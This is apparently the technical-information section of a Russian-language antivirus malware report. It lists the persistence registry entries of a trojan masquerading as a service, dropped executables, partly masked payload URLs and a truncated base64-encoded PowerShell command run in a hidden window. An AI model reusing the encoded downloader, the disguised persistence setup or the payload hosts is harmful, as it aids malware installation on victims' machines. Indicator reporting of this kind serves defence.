Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\mfcm120u] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\mfcm120u] 'ImagePath' = '"%WINDIR%\SysWOW64\BOOTVID\mfcm120u.exe"'
- 'mfcm120u' "%WINDIR%\SysWOW64\BOOTVID\mfcm120u.exe"
- 'mfcm120u' %WINDIR%\SysWOW64\BOOTVID\mfcm120u.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAGcAMABqAHIAMwBwAD0AKAAnAFIAdgB6AG0ANgAnACsAJwBxAGcAJwApADsALgAoACcAbgBlAHcALQAnACsAJwBpAHQAZQAnACsAJwBtACcAKQAgACQAZQBOAFYAOgBUAEUATQBwAFwATwBGAEYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...
- %TEMP%\office2019\ihz_2rk.exe
- %TEMP%\office2019\ihz_2rk.exe
- %TEMP%\office2019\ihz_2rk.exe в %WINDIR%\syswow64\bootvid\mfcm120u.exe
- %TEMP%\office2019\ihz_2rk.exe
- '70.##1.172.89':80
- http://th##ning.de/cgi-bin/uo9wm/
- http://po#####lmypassion.com/wp-content/gJWA/
- http://70.##1.172.89/9gE86qa8kYSd3z/xvoe5nRFVc/4SxMkZUDg/M92RHJdaFSMXtGLglZw/1O2y8PK6smeG7PRvuTJ/
- DNS ASK th##ning.de
- DNS ASK po#####lmypassion.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAGcAMABqAHIAMwBwAD0AKAAnAFIAdgB6AG0ANgAnACsAJwBxAGcAJwApADsALgAoACcAbgBlAHcALQAnACsAJwBpAHQAZQAnACsAJwBtACcAKQAgACQAZQBOAFYAOgBUAEUATQBwAFwATwBGAEYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...' (со скрытым окном)